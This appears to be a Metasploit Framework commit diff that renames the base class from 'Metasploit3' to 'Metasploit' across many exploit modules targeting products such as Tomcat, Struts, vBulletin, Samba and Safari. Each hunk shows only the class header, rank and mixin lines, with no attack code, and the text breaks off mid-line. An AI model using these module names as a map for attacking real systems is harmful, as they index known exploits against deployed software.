Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/struts_include_params.rb b/modules/exploits/multi/http/struts_include_params.rb index 555d03f990..e374c630f7 100644 --- a/modules/exploits/multi/http/struts_include_params.rb +++ b/modules/exploits/multi/http/struts_include_params.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/stunshell_eval.rb b/modules/exploits/multi/http/stunshell_eval.rb index 6612a08732..bba42107fe 100644 --- a/modules/exploits/multi/http/stunshell_eval.rb +++ b/modules/exploits/multi/http/stunshell_eval.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/stunshell_exec.rb b/modules/exploits/multi/http/stunshell_exec.rb index 33e003d6bd..2dc2d9a30e 100644 --- a/modules/exploits/multi/http/stunshell_exec.rb +++ b/modules/exploits/multi/http/stunshell_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/sun_jsws_dav_options.rb b/modules/exploits/multi/http/sun_jsws_dav_options.rb index 4ef79cf5fa..05cc0a51ff 100644 --- a/modules/exploits/multi/http/sun_jsws_dav_options.rb +++ b/modules/exploits/multi/http/sun_jsws_dav_options.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/http/client' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/sysaid_auth_file_upload.rb b/modules/exploits/multi/http/sysaid_auth_file_upload.rb index 2d879862d2..6a03a504e7 100644 --- a/modules/exploits/multi/http/sysaid_auth_file_upload.rb +++ b/modules/exploits/multi/http/sysaid_auth_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb index d2ecb468b3..dc4d89d2e3 100644 --- a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb +++ b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/testlink_upload_exec.rb b/modules/exploits/multi/http/testlink_upload_exec.rb index b5096db680..8d645f6a5c 100644 --- a/modules/exploits/multi/http/testlink_upload_exec.rb +++ b/modules/exploits/multi/http/testlink_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index 75c6beda9c..0699cd1088 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] } diff --git a/modules/exploits/multi/http/tomcat_mgr_upload.rb b/modules/exploits/multi/http/tomcat_mgr_upload.rb index 1098c9140f..5badf00211 100644 --- a/modules/exploits/multi/http/tomcat_mgr_upload.rb +++ b/modules/exploits/multi/http/tomcat_mgr_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] } diff --git a/modules/exploits/multi/http/traq_plugin_exec.rb b/modules/exploits/multi/http/traq_plugin_exec.rb index 7c972720cb..ea22ca805c 100644 --- a/modules/exploits/multi/http/traq_plugin_exec.rb +++ b/modules/exploits/multi/http/traq_plugin_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/uptime_file_upload_1.rb b/modules/exploits/multi/http/uptime_file_upload_1.rb index 7647d7b20d..966aa7ccef 100644 --- a/modules/exploits/multi/http/uptime_file_upload_1.rb +++ b/modules/exploits/multi/http/uptime_file_upload_1.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/v0pcr3w_exec.rb b/modules/exploits/multi/http/v0pcr3w_exec.rb index 1c94eb7118..afb58a7607 100644 --- a/modules/exploits/multi/http/v0pcr3w_exec.rb +++ b/modules/exploits/multi/http/v0pcr3w_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/vbseo_proc_deutf.rb b/modules/exploits/multi/http/vbseo_proc_deutf.rb index be7f303cd8..246a256409 100644 --- a/modules/exploits/multi/http/vbseo_proc_deutf.rb +++ b/modules/exploits/multi/http/vbseo_proc_deutf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/vbulletin_unserialize.rb b/modules/exploits/multi/http/vbulletin_unserialize.rb index 15f48e6c1a..017d1be37f 100644 --- a/modules/exploits/multi/http/vbulletin_unserialize.rb +++ b/modules/exploits/multi/http/vbulletin_unserialize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/visual_mining_netcharts_upload.rb b/modules/exploits/multi/http/visual_mining_netcharts_upload.rb index 88d5e8285f..d35a20b553 100644 --- a/modules/exploits/multi/http/visual_mining_netcharts_upload.rb +++ b/modules/exploits/multi/http/visual_mining_netcharts_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/vtiger_install_rce.rb b/modules/exploits/multi/http/vtiger_install_rce.rb index 3e76c223bf..ce72e96bbb 100644 --- a/modules/exploits/multi/http/vtiger_install_rce.rb +++ b/modules/exploits/multi/http/vtiger_install_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote # Application database configuration is overwritten Rank = ManualRanking diff --git a/modules/exploits/multi/http/vtiger_php_exec.rb b/modules/exploits/multi/http/vtiger_php_exec.rb index 92472d92bd..72e4fac7dd 100644 --- a/modules/exploits/multi/http/vtiger_php_exec.rb +++ b/modules/exploits/multi/http/vtiger_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/vtiger_soap_upload.rb b/modules/exploits/multi/http/vtiger_soap_upload.rb index 6769172a7a..e20c1e8549 100644 --- a/modules/exploits/multi/http/vtiger_soap_upload.rb +++ b/modules/exploits/multi/http/vtiger_soap_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include REXML diff --git a/modules/exploits/multi/http/webpagetest_upload_exec.rb b/modules/exploits/multi/http/webpagetest_upload_exec.rb index 8531ee69dc..01bebdfddb 100644 --- a/modules/exploits/multi/http/webpagetest_upload_exec.rb +++ b/modules/exploits/multi/http/webpagetest_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb index 18503fd504..3e543d43b5 100644 --- a/modules/exploits/multi/http/wikka_spam_exec.rb +++ b/modules/exploits/multi/http/wikka_spam_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/x7chat2_php_exec.rb b/modules/exploits/multi/http/x7chat2_php_exec.rb index 4bbe7f9e23..c394676a78 100644 --- a/modules/exploits/multi/http/x7chat2_php_exec.rb +++ b/modules/exploits/multi/http/x7chat2_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/zemra_panel_rce.rb b/modules/exploits/multi/http/zemra_panel_rce.rb index 57fdaadb76..38a26d2f72 100644 --- a/modules/exploits/multi/http/zemra_panel_rce.rb +++ b/modules/exploits/multi/http/zemra_panel_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/zenworks_configuration_management_upload.rb b/modules/exploits/multi/http/zenworks_configuration_management_upload.rb index b22c77322b..7c8cb704ff 100644 --- a/modules/exploits/multi/http/zenworks_configuration_management_upload.rb +++ b/modules/exploits/multi/http/zenworks_configuration_management_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/zenworks_control_center_upload.rb b/modules/exploits/multi/http/zenworks_control_center_upload.rb index f82eb98b9a..3bf5f7e330 100644 --- a/modules/exploits/multi/http/zenworks_control_center_upload.rb +++ b/modules/exploits/multi/http/zenworks_control_center_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb b/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb index 9fa8a71709..2f0e5d9af0 100644 --- a/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb +++ b/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb @@ -8,7 +8,7 @@ require 'msf/core/exploit/php_exe' require 'nokogiri' require 'uri' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper diff --git a/modules/exploits/multi/ids/snort_dce_rpc.rb b/modules/exploits/multi/ids/snort_dce_rpc.rb index 04491e6dc0..2856e8f28c 100644 --- a/modules/exploits/multi/ids/snort_dce_rpc.rb +++ b/modules/exploits/multi/ids/snort_dce_rpc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Capture diff --git a/modules/exploits/multi/misc/arkeia_agent_exec.rb b/modules/exploits/multi/misc/arkeia_agent_exec.rb index 5f709764b8..ced7e46e5b 100644 --- a/modules/exploits/multi/misc/arkeia_agent_exec.rb +++ b/modules/exploits/multi/misc/arkeia_agent_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/batik_svg_java.rb b/modules/exploits/multi/misc/batik_svg_java.rb index e1b3ec975e..5abc980108 100644 --- a/modules/exploits/multi/misc/batik_svg_java.rb +++ b/modules/exploits/multi/misc/batik_svg_java.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb b/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb index fcecbbebdf..23b754fc74 100644 --- a/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb +++ b/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/hp_vsa_exec.rb b/modules/exploits/multi/misc/hp_vsa_exec.rb index 01ea41fc06..5933825e76 100644 --- a/modules/exploits/multi/misc/hp_vsa_exec.rb +++ b/modules/exploits/multi/misc/hp_vsa_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/indesign_server_soap.rb b/modules/exploits/multi/misc/indesign_server_soap.rb index ecb6560c47..da373854fd 100644 --- a/modules/exploits/multi/misc/indesign_server_soap.rb +++ b/modules/exploits/multi/misc/indesign_server_soap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index 2304aa8855..00f06ea3fc 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/java_jmx_server.rb b/modules/exploits/multi/misc/java_jmx_server.rb index 2823fe48f0..61fe569a99 100644 --- a/modules/exploits/multi/misc/java_jmx_server.rb +++ b/modules/exploits/multi/misc/java_jmx_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/multi/misc/java_rmi_server.rb b/modules/exploits/multi/misc/java_rmi_server.rb index de41281438..bd5dcafbf6 100644 --- a/modules/exploits/multi/misc/java_rmi_server.rb +++ b/modules/exploits/multi/misc/java_rmi_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Java::Rmi::Client diff --git a/modules/exploits/multi/misc/legend_bot_exec.rb b/modules/exploits/multi/misc/legend_bot_exec.rb index ab1dd0e15b..b679d41b85 100644 --- a/modules/exploits/multi/misc/legend_bot_exec.rb +++ b/modules/exploits/multi/misc/legend_bot_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/misc/openview_omniback_exec.rb b/modules/exploits/multi/misc/openview_omniback_exec.rb index c15c193ead..3cae3a0f13 100644 --- a/modules/exploits/multi/misc/openview_omniback_exec.rb +++ b/modules/exploits/multi/misc/openview_omniback_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/pbot_exec.rb b/modules/exploits/multi/misc/pbot_exec.rb index 1dab5491c3..a14dbb5a89 100644 --- a/modules/exploits/multi/misc/pbot_exec.rb +++ b/modules/exploits/multi/misc/pbot_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb b/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb index 501df43124..1765c9d1f2 100644 --- a/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb +++ b/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb b/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb index ed53e0b7f2..d04e89ecd7 100644 --- a/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb +++ b/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb b/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb index b20a74ef78..40fe44abd5 100644 --- a/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb +++ b/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/w3tw0rk_exec.rb b/modules/exploits/multi/misc/w3tw0rk_exec.rb index 9681bb3da0..0c5823f27f 100644 --- a/modules/exploits/multi/misc/w3tw0rk_exec.rb +++ b/modules/exploits/multi/misc/w3tw0rk_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb index ee804483e5..820193d539 100644 --- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb +++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb index 18db711cc3..a063dfcbcf 100644 --- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb +++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/multi/misc/zend_java_bridge.rb b/modules/exploits/multi/misc/zend_java_bridge.rb index a433889c5e..979a7a6934 100644 --- a/modules/exploits/multi/misc/zend_java_bridge.rb +++ b/modules/exploits/multi/misc/zend_java_bridge.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/multi/ntp/ntp_overflow.rb b/modules/exploits/multi/ntp/ntp_overflow.rb index 5b0e336fc0..e175aa6b5a 100644 --- a/modules/exploits/multi/ntp/ntp_overflow.rb +++ b/modules/exploits/multi/ntp/ntp_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb index a6883a67ca..d6c1d2f893 100644 --- a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb +++ b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/realserver/describe.rb b/modules/exploits/multi/realserver/describe.rb index c6134b819a..94694007e1 100644 --- a/modules/exploits/multi/realserver/describe.rb +++ b/modules/exploits/multi/realserver/describe.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/http/client' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/samba/nttrans.rb b/modules/exploits/multi/samba/nttrans.rb index 6f1f3652da..d11f39c71f 100644 --- a/modules/exploits/multi/samba/nttrans.rb +++ b/modules/exploits/multi/samba/nttrans.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/multi/samba/usermap_script.rb b/modules/exploits/multi/samba/usermap_script.rb index 24a37cc018..f23d4e4789 100644 --- a/modules/exploits/multi/samba/usermap_script.rb +++ b/modules/exploits/multi/samba/usermap_script.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index ffeb54e5a4..f4ed147013 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index 51a57cbc44..d6f83697ba 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/multi/svn/svnserve_date.rb b/modules/exploits/multi/svn/svnserve_date.rb index 7f5a0f9234..b0c858be89 100644 --- a/modules/exploits/multi/svn/svnserve_date.rb +++ b/modules/exploits/multi/svn/svnserve_date.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/http/client' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Brute diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index d7b0a59908..2a6a0d8015 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking def initialize(info = {}) diff --git a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb index b22a3d9646..f501babeda 100644 --- a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb +++ b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/rfb' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking WINDOWS_KEY = "\xff\xeb" diff --git a/modules/exploits/multi/vpn/tincd_bof.rb b/modules/exploits/multi/vpn/tincd_bof.rb index d391ce8da5..ff72c37ab7 100644 --- a/modules/exploits/multi/vpn/tincd_bof.rb +++ b/modules/exploits/multi/vpn/tincd_bof.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'securerandom' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::EXE diff --git a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb index 786a20d57a..54640f4c96 100644 --- a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb +++ b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb @@ -6,7 +6,7 @@ require 'timeout' require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/netware/smb/lsass_cifs.rb b/modules/exploits/netware/smb/lsass_cifs.rb index 04c141d2a7..f5c5c658fc 100644 --- a/modules/exploits/netware/smb/lsass_cifs.rb +++ b/modules/exploits/netware/smb/lsass_cifs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/netware/sunrpc/pkernel_callit.rb b/modules/exploits/netware/sunrpc/pkernel_callit.rb index 0ab1da752a..c8a13b3688 100644 --- a/modules/exploits/netware/sunrpc/pkernel_callit.rb +++ b/modules/exploits/netware/sunrpc/pkernel_callit.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/osx/afp/loginext.rb b/modules/exploits/osx/afp/loginext.rb index f3ec48b721..743f8fe02e 100644 --- a/modules/exploits/osx/afp/loginext.rb +++ b/modules/exploits/osx/afp/loginext.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/osx/arkeia/type77.rb b/modules/exploits/osx/arkeia/type77.rb index 45f1f5cd58..78143a48dc 100644 --- a/modules/exploits/osx/arkeia/type77.rb +++ b/modules/exploits/osx/arkeia/type77.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Arkeia diff --git a/modules/exploits/osx/browser/mozilla_mchannel.rb b/modules/exploits/osx/browser/mozilla_mchannel.rb index c7331b84ea..0b8e001f90 100644 --- a/modules/exploits/osx/browser/mozilla_mchannel.rb +++ b/modules/exploits/osx/browser/mozilla_mchannel.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/osx/browser/safari_file_policy.rb b/modules/exploits/osx/browser/safari_file_policy.rb index e00fd67998..a008addb19 100644 --- a/modules/exploits/osx/browser/safari_file_policy.rb +++ b/modules/exploits/osx/browser/safari_file_policy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/service_manager' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/osx/browser/safari_metadata_archive.rb b/modules/exploits/osx/browser/safari_metadata_archive.rb index 27f17742a8..371471477b 100644 --- a/modules/exploits/osx/browser/safari_metadata_archive.rb +++ b/modules/exploits/osx/browser/safari_metadata_archive.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/osx/browser/safari_user_assisted_applescript_exec.rb b/modules/exploits/osx/browser/safari_user_assisted_applescript_exec.rb index 3ba0b94a96..5b6141c8e3 100644 --- a/modules/exploits/osx/browser/safari_user_assisted_applescript_exec.rb +++ b/modules/exploits/osx/browser/safari_user_assisted_applescript_exec.rb @@ -5,7 